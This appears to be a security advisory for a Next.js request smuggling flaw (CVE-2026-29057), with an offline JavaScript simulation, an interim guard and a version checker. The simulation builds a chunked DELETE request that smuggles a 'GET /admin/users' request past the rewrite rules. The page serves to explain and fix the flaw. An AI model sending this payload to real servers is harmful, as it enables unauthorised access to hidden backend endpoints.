CVE-2026-29057
Request Smuggling vulnerability in next (npm)

Category: Request Smuggling. Public exploit: none known.

What is CVE-2026-29057 About?

This Next.js vulnerability allows request smuggling when a rewrite proxies traffic to an external backend. A crafted `DELETE` or `OPTIONS` request sent with `Transfer-Encoding: chunked` causes the Next.js proxy and the backend to disagree on where the request ends, which lets an attacker smuggle a second request past the rewrite layer. The flaw breaks the assumption that the backend only sees requests the rewrite rules admitted; it is complex to exploit but high in impact.

Affected Software

  • next
    • >=16.0.0-beta.0, <16.1.7
    • >=9.5.0, <15.5.13

Technical Details

The vulnerability occurs when Next.js itself proxies a rewrite to an external backend rather than delegating it to a CDN. If a DELETE or OPTIONS request carries Transfer-Encoding: chunked, the proxy library vendored by Next.js normalises the message framing incorrectly: it strips the Transfer-Encoding header but does not emit a Content-Length that covers the body it received (the corrected behaviour adds Content-Length: 0 only when both framing headers were absent from the original request). The forwarded request therefore declares an empty body while the bytes of the chunked body are still written to the backend connection. The backend, applying the usual framing rules, reads a zero-length body and parses whatever follows as a new request. An attacker can exploit this boundary disagreement, particularly with zero-length chunked encoding, to inject a second, smuggled request that the backend processes as a distinct request which never passed through the rewrite rules.
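The framing disagreement described above, as an added example that is not code from Next.js or from its vendored proxy library. A minimal HTTP/1.1 request framer plays the backend; two normalisation rules model the behaviour the advisory describes (vulnerable: strip Transfer-Encoding and force Content-Length: 0 on DELETE/OPTIONS that lack a Content-Length; corrected: add Content-Length: 0 only when both headers were absent); and a constructed DELETE request carries a chunked body whose bytes spell out a second request. The assumption that the proxy relays the decoded body bytes after the rewritten head is the model's own, not a statement about the library's internals, and the hostnames and paths are made up. `shouldReject` is an interim edge-side guard, also an assumption, that refuses the one request shape the bug needs until the upgrade lands.

```javascript
'use strict';

// Frame a body with chunked transfer coding: one data chunk plus the
// zero-length terminator, no trailers.
function encodeChunked(body) {
  const data = body.length ? body.length.toString(16) + '\r\n' + body + '\r\n' : '';
  return data + '0\r\n\r\n';
}

// Split a raw HTTP/1.1 stream into requests the way a server frames them:
// chunked Transfer-Encoding takes precedence, then Content-Length, and a
// request with neither header has an empty body.
function parseRequests(raw) {
  const requests = [];
  let pos = 0;
  while (pos < raw.length) {
    const headEnd = raw.indexOf('\r\n\r\n', pos);
    if (headEnd === -1) break; // incomplete head: a server would wait for more bytes
    const [requestLine, ...headerLines] = raw.slice(pos, headEnd).split('\r\n');
    const [method, target] = requestLine.split(' ');
    const headers = {};
    for (const line of headerLines) {
      const i = line.indexOf(':');
      if (i === -1) continue;
      headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
    }
    pos = headEnd + 4;
    let body = '';
    if ((headers['transfer-encoding'] || '').toLowerCase() === 'chunked') {
      for (;;) { // decode chunks up to the zero-size terminator
        const lineEnd = raw.indexOf('\r\n', pos);
        if (lineEnd === -1) { pos = raw.length; break; } // truncated chunk header
        const size = parseInt(raw.slice(pos, lineEnd), 16);
        pos = lineEnd + 2;
        if (size === 0) { pos += 2; break; } // skip the empty trailer section
        body += raw.slice(pos, pos + size);
        pos += size + 2;
      }
    } else if (headers['content-length'] !== undefined) {
      const n = parseInt(headers['content-length'], 10);
      body = raw.slice(pos, pos + n);
      pos += n;
    }
    requests.push({ method, target, headers, body });
  }
  return requests;
}

// Model of the normalisation the advisory describes (an assumption, not the
// vendored library's code): for DELETE/OPTIONS without Content-Length, drop
// Transfer-Encoding and force Content-Length: 0. The body bytes already read
// from the client are still relayed, so the declared framing no longer covers them.
function normalizeVulnerable(req) {
  const headers = { ...req.headers };
  if ((req.method === 'DELETE' || req.method === 'OPTIONS') && headers['content-length'] === undefined) {
    delete headers['transfer-encoding'];
    headers['content-length'] = '0';
  }
  return { ...req, headers };
}

// Corrected rule per the advisory: add Content-Length: 0 only when both framing
// headers were absent, so a chunked request keeps its chunked framing.
function normalizeFixed(req) {
  const headers = { ...req.headers };
  if ((req.method === 'DELETE' || req.method === 'OPTIONS') &&
      headers['content-length'] === undefined && headers['transfer-encoding'] === undefined) {
    headers['content-length'] = '0';
  }
  return { ...req, headers };
}

// What the backend receives: the proxy parses the client's request, rewrites
// the head, and re-frames the decoded body according to the headers it kept.
function forwardToBackend(clientRaw, normalize) {
  const [req] = parseRequests(clientRaw);
  const out = normalize(req);
  const chunked = (out.headers['transfer-encoding'] || '').toLowerCase() === 'chunked';
  const head = [`${out.method} ${out.target} HTTP/1.1`]
    .concat(Object.entries(out.headers).map(([k, v]) => `${k}: ${v}`))
    .join('\r\n');
  return head + '\r\n\r\n' + (chunked ? encodeChunked(out.body) : out.body);
}

// Interim guard for the edge (assumption): DELETE/OPTIONS never need a chunked
// body, so refuse that shape outright until the fixed version is deployed.
function shouldReject(req) {
  return (req.method === 'DELETE' || req.method === 'OPTIONS') &&
    req.headers['transfer-encoding'] !== undefined;
}

// Constructed attacker input (not a captured exploit): a DELETE that a rewrite
// routes to the backend, whose chunked body is itself a complete second request.
const SMUGGLED = 'GET /admin/users HTTP/1.1\r\nHost: backend.internal\r\n\r\n';
const ATTACK = 'DELETE /api/items/1 HTTP/1.1\r\nHost: app.example\r\n' +
  'Transfer-Encoding: chunked\r\n\r\n' + encodeChunked(SMUGGLED);

for (const [name, rule] of [['vulnerable', normalizeVulnerable], ['fixed', normalizeFixed]]) {
  const seen = parseRequests(forwardToBackend(ATTACK, rule));
  console.log(name, seen.map(r => `${r.method} ${r.target}`));
}
```

Run with `node`: under the vulnerable rule the backend parses two requests, `DELETE /api/items/1` followed by `GET /admin/users`, while under the corrected rule it parses a single DELETE whose body merely contains the text of the GET. The second request reached the backend without ever being matched against the rewrite rules, which is the bypass the advisory describes.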

What is the Impact of CVE-2026-29057?

Successful exploitation lets an attacker bypass rewrite rules, reach internal or admin endpoints on the backend that the rewrite layer was meant to hide, and trigger unintended actions on backend services, potentially leading to unauthorized access and data manipulation.

What is the Exploitability of CVE-2026-29057?

Exploitation requires sending a crafted DELETE or OPTIONS request with Transfer-Encoding: chunked to a Next.js application that rewrites traffic to an external backend. The attack is remote and needs neither authentication nor elevated privileges. Complexity is rated high because it depends on precisely crafted HTTP framing that the proxy and backend interpret differently, and on timing, potentially with concurrent connections, so that the smuggled request lands where it will be processed. The risk is greatest for applications that handle their own rewrites rather than delegating them to a CDN, since the smuggled request reaches internal endpoints that should never be directly exposed.

What are the Known Public Exploits?

No known public exploits (no PoC, author, link or commentary recorded).

What are the Available Fixes for CVE-2026-29057?

Available Upgrade Options

  • next
    • >=9.5.0, <15.5.13 → Upgrade to 15.5.13
    • >=16.0.0-beta.0, <16.1.7 → Upgrade to 16.1.7
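An added version check, not part of the advisory or of Next.js, for deciding whether an installed `next` falls inside the affected ranges listed above and which fix version applies. It implements semver ordering with prerelease rules, so that 16.0.0-beta.0 is recognised as inside the affected range while a 16.0.0 alpha build is outside it. The version string is assumed to come from `npm ls next` or from the installed package's package.json; the ranges are copied from the advisory.

```javascript
'use strict';

// Parse "major.minor.patch[-prerelease]" (an optional leading "v" is tolerated).
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?/.exec(v);
  if (!m) throw new Error(`not a semver version: ${v}`);
  return { core: [Number(m[1]), Number(m[2]), Number(m[3])], pre: m[4] ? m[4].split('.') : null };
}

// Semver ordering: compare the core tuple, then prerelease identifiers. A
// prerelease sorts below the release with the same core (16.0.0-beta.0 < 16.0.0),
// numeric identifiers compare numerically and sort below alphanumeric ones,
// and a longer identifier list wins when all shared identifiers are equal.
function compareVersions(a, b) {
  const x = parseVersion(a), y = parseVersion(b);
  for (let i = 0; i < 3; i++) if (x.core[i] !== y.core[i]) return x.core[i] - y.core[i];
  if (!x.pre && !y.pre) return 0;
  if (!x.pre) return 1;
  if (!y.pre) return -1;
  for (let i = 0; i < Math.max(x.pre.length, y.pre.length); i++) {
    if (x.pre[i] === undefined) return -1;
    if (y.pre[i] === undefined) return 1;
    const nx = /^\d+$/.test(x.pre[i]), ny = /^\d+$/.test(y.pre[i]);
    if (nx && ny) {
      if (Number(x.pre[i]) !== Number(y.pre[i])) return Number(x.pre[i]) - Number(y.pre[i]);
    } else if (nx) return -1;
    else if (ny) return 1;
    else if (x.pre[i] !== y.pre[i]) return x.pre[i] < y.pre[i] ? -1 : 1;
  }
  return 0;
}

// Affected ranges from the advisory: lower bound inclusive, upper bound exclusive,
// and the version to upgrade to.
const AFFECTED = [
  { min: '9.5.0', max: '15.5.13', fixed: '15.5.13' },
  { min: '16.0.0-beta.0', max: '16.1.7', fixed: '16.1.7' },
];

// Return the matching range (with its fix version) or null when not affected.
function affectedRange(version) {
  return AFFECTED.find(r => compareVersions(version, r.min) >= 0 &&
                            compareVersions(version, r.max) < 0) || null;
}

// Constructed sample versions, e.g. as reported by `npm ls next`.
for (const v of ['15.5.12', '15.5.13', '16.0.0-beta.0', '16.1.6', '16.1.7']) {
  const hit = affectedRange(v);
  console.log(v, hit ? `affected, upgrade to ${hit.fixed}` : 'not affected');
}
```

Note that this deliberately classes a prerelease build below a fixed version (for example a 15.5.13 canary) as affected, which is stricter than npm's default range matching, where prereleases only satisfy comparators on the same major.minor.patch tuple; for a security check the stricter reading is the safer one.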


Additional Resources

What are Similar Vulnerabilities to CVE-2026-29057?

Similar Vulnerabilities: CVE-2023-42823, CVE-2022-31792, CVE-2020-14199, CVE-2019-17558, CVE-2019-14838